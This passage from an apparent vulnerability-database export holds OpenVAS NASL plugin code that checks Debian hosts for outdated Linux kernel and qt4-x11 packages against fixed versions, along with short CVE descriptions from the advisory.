report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-rt-amd64-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-s390x\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-5-s390x-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-6-4kc-malta\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-6-4kc-malta-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-6-5kc-malta\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-6-5kc-malta-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-6-686\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-6-686-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-6-686-pae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-6-686-pae-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-6-amd64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-6-amd64-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-6-arm64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-6-arm64-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-6-armmp\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-6-armmp-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-6-armmp-lpae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-6-armmp-lpae-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-6-loongson-3\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-6-loongson-3-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-6-marvell\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-6-marvell-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-6-octeon\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-6-octeon-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-6-powerpc64le\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-6-powerpc64le-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-6-rt-686-pae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-6-rt-686-pae-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-6-rt-amd64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-6-rt-amd64-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-6-s390x\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-6-s390x-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-7-4kc-malta\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-7-4kc-malta-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-7-5kc-malta\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-7-5kc-malta-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-7-686\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-7-686-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-7-686-pae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-7-686-pae-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-7-amd64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-7-amd64-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-7-arm64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-7-arm64-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-7-armmp\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-7-armmp-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-7-armmp-lpae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-7-armmp-lpae-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-7-loongson-3\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-7-loongson-3-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-7-marvell\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-7-marvell-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-7-octeon\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-7-octeon-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-7-powerpc64le\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-7-powerpc64le-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-7-rt-686-pae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-7-rt-686-pae-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-7-rt-amd64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-7-rt-amd64-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-7-s390x\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-7-s390x-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-8-4kc-malta\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-8-4kc-malta-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-8-5kc-malta\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-8-5kc-malta-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-8-686\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-8-686-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-8-686-pae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-8-686-pae-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-8-amd64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-8-amd64-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-8-arm64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-8-arm64-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-8-armmp\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-8-armmp-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-8-armmp-lpae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-8-armmp-lpae-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-8-loongson-3\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-8-loongson-3-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-8-marvell\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-8-marvell-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-8-octeon\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-8-octeon-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-8-powerpc64le\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-8-powerpc64le-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-8-rt-686-pae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-8-rt-686-pae-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-8-rt-amd64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-8-rt-amd64-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-8-s390x\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-8-s390x-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-9-4kc-malta\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-9-4kc-malta-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-9-5kc-malta\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-9-5kc-malta-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-9-686\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-9-686-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-9-686-pae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-9-686-pae-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-9-amd64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-9-amd64-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-9-arm64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-9-arm64-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-9-armmp\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-9-armmp-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-9-armmp-lpae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-9-armmp-lpae-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-9-loongson-3\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-9-loongson-3-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-9-marvell\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-9-marvell-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-9-octeon\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-9-octeon-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-9-powerpc64le\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-9-powerpc64le-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-9-rt-686-pae\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-9-rt-686-pae-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-9-rt-amd64\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-9-rt-amd64-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-9-s390x\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-9-s390x-dbg\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-kbuild-4.9\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-manual-4.9\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-perf-4.9\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-source-4.9\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-support-4.9.0-3\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-support-4.9.0-4\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-support-4.9.0-5\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-support-4.9.0-6\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-support-4.9.0-7\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-support-4.9.0-8\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-support-4.9.0-9\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"usbip\", ver:\"4.9.168-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-16T12:22:09", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-05-15T00:00:00", "published": "2019-05-15T00:00:00", "id": "OPENVAS:1361412562310891786", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891786", "title": "Debian LTS Advisory ([SECURITY] [DLA 1786-1] qt4-x11 security update)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891786\");\n script_version(\"2019-05-15T02:00:11+0000\");\n script_cve_id(\"CVE-2018-15518\", \"CVE-2018-19869\", \"CVE-2018-19870\", \"CVE-2018-19871\", \"CVE-2018-19873\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-15 02:00:11 +0000 (Wed, 15 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-15 02:00:11 +0000 (Wed, 15 May 2019)\");\n script_name(\"Debian LTS Advisory ([SECURITY] [DLA 1786-1] qt4-x11 security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2019/05/msg00014.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-1786-1\");\n script_xref(name:\"URL\", value:\"https://bugs.debian.org/923003\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'qt4-x11'\n package(s) announced via the DSA-1786-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple issues have been addressed in Qt4.\n\nCVE-2018-15518\n\nA double-free or corruption during parsing of a specially crafted\nillegal XML document.\n\nCVE-2018-19869\n\nA malformed SVG image could cause a segmentation fault in\nqsvghandler.cpp.\n\nCVE-2018-19870\n\nA malformed GIF image might have caused a NULL pointer dereference in\nQGifHandler resulting in a segmentation fault.\n\nCVE-2018-19871\n\nThere was an uncontrolled resource consumption in QTgaFile.\n\nCVE-2018-19873\n\nQBmpHandler had a buffer overflow via BMP data.\");\n\n script_tag(name:\"affected\", value:\"'qt4-x11' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2.\n\nWe recommend that you upgrade your qt4-x11 packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-assistant\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-core\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-dbg\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-dbus\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-declarative\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-declarative-folderlistmodel\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-declarative-gestures\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-declarative-particles\", ver:\"4:4.8.6+git64-g5dc8b2b+dfsg-3+deb8u2\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libqt4-declarative-shaders\", 